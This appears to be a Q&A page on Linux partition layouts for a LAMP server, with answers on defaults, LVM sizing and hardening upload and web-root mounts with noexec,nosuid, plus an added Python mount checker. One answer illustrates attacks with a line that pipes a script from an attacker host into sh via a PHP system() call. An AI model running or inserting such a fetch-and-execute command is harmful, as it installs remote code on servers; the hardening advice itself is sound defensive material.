Suggested Linux partitions layout for an LAMP server?


Solution 1

I suggest using your OS's default layout unless you have some special considerations, e.g. large amounts of data, very high usage, or potentially large growth.

You can always expand later... for example we often have: /tmp, /boot and /. Should mysql get bogged down due to disk IO, we can add another disk or SAN mount at /var/lib/mysql.

If your doc root is /var/www, you can always mount more disk resources as well.

Some will tout performance benefits of using a more fine grained system, but I often find the claims do not hold up in real-world applications or have little performance impact because the system is not disk IO limited.

Solution 2

If nothing else matters *sings along with Metallica*, you should at least take care that you have a separate mount for PHP uploads / temporary files and for your web root mounted with nosuid,noexec flags. That stops about 99% of script kiddie attacks.

Why?

Because practically all of them seem to use a pattern like

1) Find a weakness in some PHP script, like passing arbitrary code via some URL parameter.

2.1) Upload a file containing C code or a shell script from some nice web form you have there in your site.

or

2.2) Make your web server download and execute some nasty code via URL parameters like `system("curl http://icanhazyourcheezburger.com/ipwnj00.sh | sh")` or so. Some of these instruct your server to first fetch the C source code and compile it with gcc, so disabling gcc for the Apache user is a good idea, too.

3) See how you have a nice backdoor installed in your server.

So, how does noexec,nosuid help in this case? No code would be executed at all. Yeah yeah, that CAN be overridden, but it's getting harder and anyway security is made of layers, this noexec,nosuid thing is just one of them.
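
A way to check that the upload, temp and web-root paths from Solution 2 really sit on mounts carrying `noexec` and `nosuid`, as an added example that is not part of the original answer. The sample mount table, volume names and paths such as `/var/www/uploads` are constructed for illustration.

```python
import os
import re
import sys

# Constructed sample in /proc/mounts format: device, mount point, type, options, dump, pass.
SAMPLE_MOUNTS = """\
/dev/mapper/vg0-root / ext4 rw,relatime 0 0
/dev/mapper/vg0-var /var ext4 rw,relatime 0 0
/dev/mapper/vg0-www /var/www ext4 rw,nosuid,nodev,noexec,relatime 0 0
/dev/mapper/vg0-upl /var/www/uploads ext4 rw,nosuid,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
"""
REQUIRED = frozenset({"noexec", "nosuid"})  # the flags the answer recommends


def parse_mounts(text):
    """Return [(mount_point, options)] in file order from /proc/mounts-style text."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0].startswith("#"):
            continue
        # The kernel writes spaces and tabs in mount points as octal escapes (\040).
        point = re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), fields[1])
        mounts.append((point, set(fields[3].split(","))))
    return mounts


def covering_mount(path, mounts):
    """Pick the deepest mount point containing path; on a tie the later entry wins."""
    path, best = os.path.normpath(path), None
    for point, options in mounts:
        point = point.rstrip("/") or "/"
        # Compare whole path components so /var/www does not claim /var/www2.
        inside = point == "/" or path == point or path.startswith(point + "/")
        if inside and (best is None or len(point) >= len(best[0])):
            best = (point, options)
    return best


def missing_flags(path, mounts, required=REQUIRED):
    """Sorted list of required flags absent from the mount that holds path."""
    mount = covering_mount(path, mounts)
    return sorted(required - mount[1]) if mount else sorted(required)


if __name__ == "__main__":
    # Live use: pass the upload, temp and docroot paths as arguments.
    live = len(sys.argv) > 1
    table = parse_mounts(open("/proc/mounts").read() if live else SAMPLE_MOUNTS)
    for p in sys.argv[1:] or ["/var/www", "/var/www/uploads", "/tmp", "/var/www2"]:
        p = os.path.realpath(p) if live else p
        print(p, "OK" if not missing_flags(p, table) else missing_flags(p, table))
```

In the sample, `/tmp` is reported as missing `noexec`, and `/var/www2` falls through to the plain `/var` mount, which is the kind of gap that appears when a new docroot is added beside a hardened one.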

Solution 3

I usually do the following (using Debian):

I put everything into LVM (this works with Grub2).

  • /boot 1GB (space for a rescue/install cd image or something else tricky. Can be kept off LVM if you are cautious).
  • / 5-10 GB, maybe 20GB if I need Matlab or something else in /opt
  • /home size depends on server (what kind of users? how many? how much data?)
  • /var again size depends on server (logfiles, mostly)
  • /srv and again size depends, but this is where I would put docroot (/srv/www)

Specifically I do not fill up the entire VG, as that gives me more room to play as requirements change. And growing filesystems can be done online using LVM.

Author by

HopelessN00b

Updated on September 17, 2022

Comments

  • HopelessN00b
    HopelessN00b over 1 year

    I need some suggestions on what would be the best approach for the partition layout for an LAMP server, that is LINUX + APACHE + PHP + MYSQL.

  • Lennert
    Lennert about 14 years
    +1 for de-fault. Linux admins have a long history of turning partition layouts into minefields of over-engineering one-upsmanship. Unless you have some pre-existing design and a well thought case for it, trust your distro.
  • ivanacorovic
    ivanacorovic about 14 years
    What's wrong? Maybe there are some inaccuracies, but I don't understand what's wrong.
  • ivanacorovic
    ivanacorovic about 14 years
    The only inaccuracy I found: 1. if you want a partition for logs, it will be /var/log, not /var, as I wrote. I also found it not only useless, but also harmful to give negative feedback without explanation, because not only do the policies of the site say that it should be given, but it is also meaningful, because with an explanation the author of the erroneous text and the other readers can learn, while without such explanations the right thing to do could be to leave serverfault for ever, either for questions or for answers.
  • Aaron Copley
    Aaron Copley over 13 years
    This is why you don't answer with just a link. The site is now down and no one can see the content. sigh
  • NuckinFutz
    NuckinFutz over 13 years
    Yeah, that sucks. I suppose that's to be expected. Luckily the Internet Archive has a copy: web.archive.org/web/20080609200241/http://sial.org/howto/…